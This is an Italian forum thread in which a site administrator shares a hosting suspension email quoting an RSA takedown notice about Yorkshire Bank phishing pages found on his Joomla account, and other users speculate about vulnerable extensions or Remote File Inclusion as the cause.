Attacco Phising nel mio dominio

[morris2003]

Amministro un dominio e ieri sera mi sn visto bloccare l'account in seguito a questa email:

Dear Customer,
Thank you for contacting customer support. We appreciate you taking the time to write us.
Abbiamo ricevuto questo messaggio:

RSA, an anti-fraud and security company, is under contract to assist YORKSHIRE Bank and its related entities in preventing or terminating online activity that targets Yorkshire's Bank clients as potential fraud victims. RSA has been made aware that you appear to be providing Internet Services to a fraudulent Web site, which is part of a “phishing scamâ€￾*. This activity violates Yorkshire's Bank copyright, trademark and other intellectual property rights and may violate the criminal laws of the United States and other nations.

E-mail messages have been broadly distributed to individuals by a person or entity pretending to be YORKSHIRE Bank. These e-mails use Yorkshire's Bank name and identity (including trademarks) without authorization. The e-mails request recipients to verify and submit sensitive details related to their YORKSHIRE Bank accounts. Within the fraudulent e-mail message, there is a link that leads the recipients to a fraudulent website displaying Yorkshire's Bank copyrighted materials and trademarks. The fraudulent website is located at the following URL addresses to which you provide services and which are under your control:

http://xxx/atletic2.trsdirect2ybonline.co.uk/login.ct.php (2142)
http://xxx/atletic1.c0udirect2ybonline.co.uk/login.ct.php (2142.01)
http://xxx/atleticatletic20hdirect2ybonline.co.uk/login.ct.php (2142.02)
http://xxx/atletic1u.3hdirect2ybonline.co.uk/login.ct.php (2142.03)
http://xxx/atletic1.7q0ndirect2ybonline.co.uk/login.ct.php (2142.04)
http://xxx/atletic24u.0direct2ybonline.co.uk/login.ct.php (2142.05)
http://xxx/atletic3uu1direct2ybonline.co.uk/login.ct.php (2142.06)

The fraudulent website not only represents a misuse of Yorkshire's Bank intellectual property; its purpose is to improperly obtain personal information of YORKSHIRE Bank customers in order to fraudulently access their bank accounts. The owners of those websites typically perpetrate identity-theft related activities, such as using customer’s credit cards or bank accounts without authorization. In addition, since the vast majority of all of the e-mails are not being sent to actual YORKSHIRE Bank customers, the actions may serve to damage the reputation and image of YORKSHIRE Bank.
Please take all necessary steps to immediately shut down the fraudulent website, terminate its availability to the Internet and discontinue the transmission of any e-mails associated with this website.

We understand that you may not be aware of this improper use of your services and we appreciate your cooperation. We specifically would ask that you also take the following actions:

Please provide us with a tar/zip file of the source code for this site, so that we may analyze it to help prevent further attacks.

If any customer data has been captured that is stored on your systems or equipment, please send us that data so that the customers to whom that data relates can be notified and take steps to protect their credit.

Please provide a copy of any records you maintain that indicate the name, contact information, method of payment or similar information that may be useful in helping learn about the identity and location of the customer for whom the website has been operated.

Thank you for your cooperation to prevent and terminate this fraudulent activity.
Sincerely,
RSA Anti Fraud Command Center
Tel: +44(0)800-032-7751 (UK)
Tel: +1-866-408-7525 (US)
Fax: +972-9-9566658 (EU)
Fax: +1-212-208-4644 (US)
E-mail: [email protected]

YORKSHIRE Bank Legal Department
Name: Dispute Resolution
Address: Level 2, 40 St Vincent Place, Glasgow, G1 2HL
Tel: +44 141 242 3719
Fax: +44 141 242 4723

*â€￾Phishing" is an e-mail scam that attempts to trick consumers into revealing personal information, such as their credit or debit account numbers, checking account information, Social Security Numbers, or banking account passwords, through an imposter’s Web site or in a reply e-mail.


Abbiamo verificato ed effettivamente ha molti files nel suo hosting account, dobbiamo necessariamente formattare il suo account perché infetto. Al momento lo sospendiamo fino a sua risposta per permettergli di salvare qualche file.

Please let us know if we can help you in any other way.

Yours Faithfully,
Support/Sales Dept.

Avevo Joomla 1.5.15 installato. Com'è possibile che siano riusciti a creare tali sottocartelle e relativi files senza accedere allo spazio ftp? (ho controllato i log del ftp ed è tutto regolare)...

 

[BrainStorm]

Joomla è un CMS relativamente giovane. E' naturale che sia quello maggiormente esposto ad attacchi. Io per i miei siti utilizzo PHP Nuke che a mio parere è quello più stabile e sicuro ma il mio è solo un parere personale.

 

[morris2003]

Utilizzano Apache 2.2.11 come WebServer...non è che è stata utilizzata qualche falla?

 

[meh.]

E' piu' prababile abbiano bucato Joomla che Apache 2.2.x.

 

[murdercode_imported]

più che dare la colpa a joomla la darei ai moduli scritti coi piedi

 

[morris2003]

più che dare la colpa a joomla la darei ai moduli scritti coi piedi

Puoi spiegarti meglio please?

 

[BrainStorm]

Quali moduli hai caricato in joomla?
Molto probabilmente avranno utilizzato dei moduli buggati per il caricamento di file (esempio foto) già presenti nel tuo CMS oppure un attacco di tipo RFI (Remote File Inclusion). Per il secondo caso puoi sempre controllare i log HTTP.

 

[morris2003]

Moduli --> http://i50.tinypic.com/x4hlvm.png
Plugin --> http://i45.tinypic.com/10qgtpz.png

 

[orakool]

più che dare la colpa a joomla la darei ai moduli scritti coi piedi

Puoi spiegarti meglio please?

Semplice, joomla di per sé è sicuramente più sicuro dei moduli ed estensioni scritte da terze parti, che non vengono direttamente revisionate dal team principale per la sicurezza.